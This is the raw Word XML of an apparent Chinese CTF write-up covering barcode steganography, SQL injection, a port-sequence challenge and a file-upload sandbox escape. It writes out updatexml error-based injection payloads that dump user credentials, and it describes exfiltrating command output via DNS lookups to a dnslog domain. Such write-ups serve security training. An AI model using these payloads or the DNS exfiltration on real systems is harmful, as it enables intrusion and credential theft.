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775" w:rsidRDefault="00F05F4A" w:rsidP="00105DCE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x01</w:t>
      </w:r>
      <w:r w:rsidR="00523DAD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00105DCE">
        <w:t>条形码隐写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F05F4A" w:rsidRDefault="00F05F4A">
      <w:r>
        <w:t>把条形码扔</w:t>
      </w:r>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:r>
        <w:t>里面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>然后反色</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>填充</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F05F4A" w:rsidRDefault="00E94BC2">
      <w:r w:rsidRPr="00E94BC2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3058826"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1" name="图片 1" descr="C:\Users\bystu\Documents\Tencent Files\97593559\Image\C2C\Image1\$D8MQI2`_(D%$%LPDGLD4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ystu\Documents\Tencent Files\97593559\Image\C2C\Image1\$D8MQI2`_(D%$%LPDGLD4R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675" w:rsidRDefault="00677AAE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ACB0E7" wp14:editId="3D2B6ED8">
            <wp:extent cx="5274310" cy="3326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AB" w:rsidRDefault="009326AB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26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586674"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="C:\Users\bystu\Desktop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ystu\Desktop\aa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675" w:rsidRDefault="00523DAD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然后拿工具识别一下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得到第二关的地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523DAD" w:rsidRDefault="00523DAD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E61A95" wp14:editId="5AD6BCAD">
            <wp:extent cx="5274310" cy="2780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AD" w:rsidRDefault="00833829" w:rsidP="00312DC9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x02</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F33B4">
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00833829" w:rsidRDefault="00DF6549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查看源码，很显然是个注入，而且没有过滤\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF6549" w:rsidRDefault="00F83EF5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所以把用户名设为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\，然后会报错，直接xpath报错注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F83EF5" w:rsidRDefault="00337DC8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%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0a替代空格</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA725F" w:rsidRDefault="00AE5D4A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Table_name </w:t>
      </w:r>
      <w:r w:rsidR="00EA725F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r w:rsidR="00EA725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EA725F" w:rsidRPr="00EA725F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>username=\&amp;password=+%0a+or+%0a+updatexml(1,concat(0x7e,(select%0atable_name%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()%0alimit%0a0,2),0x7e),1)+%0a+--%0c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA725F" w:rsidRDefault="00BB073A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2FE239" wp14:editId="67B09120">
            <wp:extent cx="5274310" cy="3950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3A" w:rsidRDefault="00331E81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字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00331E81" w:rsidRDefault="00331E81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E81">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>username=\&amp;password=+%0a+or+%0a+updatexml(1,concat(0x7e,(select%0acolumn_name%0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>afrom%0ainformation_schema</w:t>
      </w:r>
      <w:r w:rsidRPr="00331E81">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.columns%0awhere%0atable_name=0x7573657273%0alimit%0a0,1),0x7e),1)+%0a+--%0c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00331E81" w:rsidRDefault="00331E81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9014EF" wp14:editId="35207360">
            <wp:extent cx="5274310" cy="3929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81" w:rsidRDefault="00F67707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内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F67707" w:rsidRDefault="00592DF7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2DF7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>username=\&amp;password=+%0a+or+%0a+updatexml(1,concat(0x7e,(select%0aconcat(username,0x7e,password)%0afrom%0ausers%0alimit%0a1,1),0x7e),1)+%0a+--%0c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C86D7E" w:rsidRDefault="00C86D7E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9057AB" wp14:editId="61821B30">
            <wp:extent cx="5274310" cy="3933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7E" w:rsidRDefault="00E32A41" w:rsidP="0002077E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x03</w:t>
      </w:r>
      <w:r w:rsidR="002B0E37">
        <w:t xml:space="preserve"> ppc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E32A41" w:rsidRDefault="004C78E4" w:rsidP="00D73675">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00E202FB" w:rsidRPr="001813B3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://114.215.211.232:4321/server_96a7294dc5c837cbd030318d892dc433</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E202FB" w:rsidRDefault="00FC3929" w:rsidP="00D73675">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>开了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1234</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口，生成一个随机数，然后</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3929">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3929">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sub_400E36</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3929">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据随机数计算了一个值，如果向服务器发送的值和这个值相等，就会换一个端口进入下一重循环，如果不对就会断开连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC3929" w:rsidRDefault="00FC3929" w:rsidP="00FC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92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51164" cy="4045305"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="12" name="图片 12" descr="C:\Users\bystu\Documents\Tencent Files\97593559\Image\C2C\Image1\1R8$TXZ1I@9M7P$QU}]F$2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ystu\Documents\Tencent Files\97593559\Image\C2C\Image1\1R8$TXZ1I@9M7P$QU}]F$2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978" cy="404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29" w:rsidRPr="00FC3929" w:rsidRDefault="00FC3929" w:rsidP="00FC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9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74645" cy="621665"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
            <wp:docPr id="13" name="图片 13" descr="C:\Users\bystu\Documents\Tencent Files\97593559\Image\C2C\Image1\V8@I3CJ~~~[2]0P]%KV()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ystu\Documents\Tencent Files\97593559\Image\C2C\Image1\V8@I3CJ~~~[2]0P]%KV()9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29" w:rsidRPr="00FC3929" w:rsidRDefault="00FC3929" w:rsidP="00FC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929" w:rsidRDefault="00FC3929" w:rsidP="00FC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929">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>然后每次更换端口是按照这个来的，可以算出来端口顺序是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC3929" w:rsidRPr="00FC3929" w:rsidRDefault="00FC3929" w:rsidP="00FC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9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1880" cy="255905"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="15" name="图片 15" descr="C:\Users\bystu\Documents\Tencent Files\97593559\Image\C2C\Image1\WFX8UYV5QNW3X@IAJRUCL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ystu\Documents\Tencent Files\97593559\Image\C2C\Image1\WFX8UYV5QNW3X@IAJRUCLG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29" w:rsidRPr="00FC3929" w:rsidRDefault="00FC3929" w:rsidP="00FC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929">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2713,6350,6175,8764</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E202FB" w:rsidRDefault="00FC3929" w:rsidP="00D73675">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC3929">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后写个脚本依次向每个端口发送正确的值，当</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3929">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3929">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次全部都正确了，就能得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3929">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC3929">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC3929" w:rsidRPr="00FC3929" w:rsidRDefault="00FC3929" w:rsidP="00D73675">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>脚本</w:t>
      </w:r>
      <w:r>
        <w:t>ppc.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C86D7E" w:rsidRDefault="00741E67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运行</w:t>
      </w:r>
      <w:r w:rsidR="00E13F5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33682F" w:rsidRPr="0033682F" w:rsidRDefault="0033682F" w:rsidP="003368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82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57265" cy="2355215"/>
            <wp:effectExtent l="0" t="0" r="635" b="6985"/>
            <wp:docPr id="9" name="图片 9" descr="C:\Users\bystu\Documents\Tencent Files\97593559\Image\C2C\Image1\09B`R{0Y783(KL[3_ZB6Y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ystu\Documents\Tencent Files\97593559\Image\C2C\Image1\09B`R{0Y783(KL[3_ZB6YD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81" w:rsidRDefault="00331E81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1E81" w:rsidRDefault="00C72671" w:rsidP="00123AE7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x04</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> upload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C72671" w:rsidRDefault="004C78E4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="00033BD9" w:rsidRPr="001813B3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http://121.40.198.171:2333/upload_c106711077badfc930278696d1c9ff36</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E06FB4" w:rsidRDefault="00E06FB4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测试了下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A0CE0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>判断的文件头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A0CE0" w:rsidRDefault="001A0CE0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5126E3" wp14:editId="3EB62223">
            <wp:extent cx="5274310" cy="39198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53" w:rsidRDefault="00977753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源码里面有个提示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samdbox信息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ubuntu14.4 32位</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00977753" w:rsidRDefault="00977753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328453" wp14:editId="333DA5A8">
            <wp:extent cx="5274310" cy="7493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E0" w:rsidRDefault="00283739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编译个c文件上去试试能不能执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00977753" w:rsidRDefault="0008720E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一开始怎么执行都不管用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啥命令都没回显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然后想起来bugscan的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DNSLog，</w:t>
      </w:r>
      <w:r w:rsidR="00520967">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidR="0073417A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>下网址，看看能不能收到，虽然没收到web</w:t>
      </w:r>
      <w:r w:rsidR="0073417A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>log但是收到了dnslog</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0008720E" w:rsidRDefault="005C3A79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A6E500" wp14:editId="381BCD5A">
            <wp:extent cx="5142857" cy="1180952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07B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="093FFEC1" wp14:editId="0A87AF09">
            <wp:extent cx="5274310" cy="19380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8B" w:rsidRDefault="005C3A79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所以就想用c执行命令，然后拼接到</w:t>
      </w:r>
      <w:r w:rsidRPr="005C3A79">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>24c0898c.dnslog.link</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这个域名的前面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然后平台就会接收到dns记录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1638B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>跟xss平台利用方法相似</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1638B" w:rsidRDefault="00A1638B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脚本在附件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C3401" w:rsidRDefault="001C3401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其中dns中不能有空格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所以hex</w:t>
      </w:r>
      <w:r w:rsidR="0087357D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC0E7A" w:rsidRDefault="00DC0E7A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最后在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/home/</w:t>
      </w:r>
      <w:r w:rsidR="00F552E4" w:rsidRPr="00F552E4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cuckoo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>下找到了flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC0E7A" w:rsidRDefault="0053043C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读取的时候第一次只能读到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>126个字节，不知道为什么，然后又改了下脚本，从126开始，然后就全部读取了，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053043C" w:rsidRDefault="00CF1EA6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8117723" wp14:editId="43301402">
            <wp:extent cx="5274310" cy="19081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A6" w:rsidRDefault="00CF1EA6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0289E0" wp14:editId="1FCBC1C4">
            <wp:extent cx="5274310" cy="17875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3C" w:rsidRDefault="0053043C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E7A" w:rsidRDefault="008F14C3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4C8221" wp14:editId="40CA80C7">
            <wp:extent cx="5274310" cy="33578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90" w:rsidRDefault="00CA5590" w:rsidP="00D7367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D73675" w:rsidRDefault="00D73675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3675" w:rsidRPr="00D73675" w:rsidRDefault="00D73675" w:rsidP="00D73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4BC2" w:rsidRDefault="00E94BC2"/>
    <w:sectPr w:rsidR="00E9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8E4" w:rsidRDefault="004C78E4" w:rsidP="00472439">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="004C78E4" w:rsidRDefault="004C78E4" w:rsidP="0047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8E4" w:rsidRDefault="004C78E4" w:rsidP="00472439">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="004C78E4" w:rsidRDefault="004C78E4" w:rsidP="00472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4"/>
    <w:rsid w:val="0002077E"/>
    <w:rsid w:val="00033BD9"/>
    <w:rsid w:val="0008720E"/>
    <w:rsid w:val="00105DCE"/>
    <w:rsid w:val="00123AE7"/>
    <w:rsid w:val="00193D7D"/>
    <w:rsid w:val="001A0CE0"/>
    <w:rsid w:val="001C3401"/>
    <w:rsid w:val="00283739"/>
    <w:rsid w:val="002B0E37"/>
    <w:rsid w:val="00312DC9"/>
    <w:rsid w:val="00331E81"/>
    <w:rsid w:val="0033682F"/>
    <w:rsid w:val="00337DC8"/>
    <w:rsid w:val="003A507B"/>
    <w:rsid w:val="00472439"/>
    <w:rsid w:val="00473273"/>
    <w:rsid w:val="004757C3"/>
    <w:rsid w:val="004B13E3"/>
    <w:rsid w:val="004C78E4"/>
    <w:rsid w:val="00520967"/>
    <w:rsid w:val="00523DAD"/>
    <w:rsid w:val="0053043C"/>
    <w:rsid w:val="00592DF7"/>
    <w:rsid w:val="005C3A79"/>
    <w:rsid w:val="005F6591"/>
    <w:rsid w:val="00677AAE"/>
    <w:rsid w:val="006F33B4"/>
    <w:rsid w:val="0073417A"/>
    <w:rsid w:val="00741E67"/>
    <w:rsid w:val="00761C97"/>
    <w:rsid w:val="008060C5"/>
    <w:rsid w:val="00833829"/>
    <w:rsid w:val="008653CB"/>
    <w:rsid w:val="0087357D"/>
    <w:rsid w:val="008F14C3"/>
    <w:rsid w:val="009326AB"/>
    <w:rsid w:val="00977753"/>
    <w:rsid w:val="00A00AE0"/>
    <w:rsid w:val="00A1638B"/>
    <w:rsid w:val="00AE5D4A"/>
    <w:rsid w:val="00BB073A"/>
    <w:rsid w:val="00C72671"/>
    <w:rsid w:val="00C86D7E"/>
    <w:rsid w:val="00CA5590"/>
    <w:rsid w:val="00CD3775"/>
    <w:rsid w:val="00CF1EA6"/>
    <w:rsid w:val="00D41C3C"/>
    <w:rsid w:val="00D73675"/>
    <w:rsid w:val="00DC0E7A"/>
    <w:rsid w:val="00DF6549"/>
    <w:rsid w:val="00E06FB4"/>
    <w:rsid w:val="00E13F5E"/>
    <w:rsid w:val="00E202FB"/>
    <w:rsid w:val="00E32A41"/>
    <w:rsid w:val="00E94BC2"/>
    <w:rsid w:val="00EA725F"/>
    <w:rsid w:val="00F023A4"/>
    <w:rsid w:val="00F05F4A"/>
    <w:rsid w:val="00F552E4"/>
    <w:rsid w:val="00F67707"/>
    <w:rsid w:val="00F83EF5"/>
    <w:rsid w:val="00FC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9524F-EEDB-4538-A2F6-89FEF973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5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05D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202F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72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24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2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2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14.215.211.232:4321/server_96a7294dc5c837cbd030318d892dc433" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://121.40.198.171:2333/upload_c106711077badfc930278696d1c9ff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226</Words>
  <Characters>1294</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>10</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>P R C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By</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Student By</cp:lastModifiedBy>
  <cp:revision>66</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-08-21T09:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-08-21T12:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>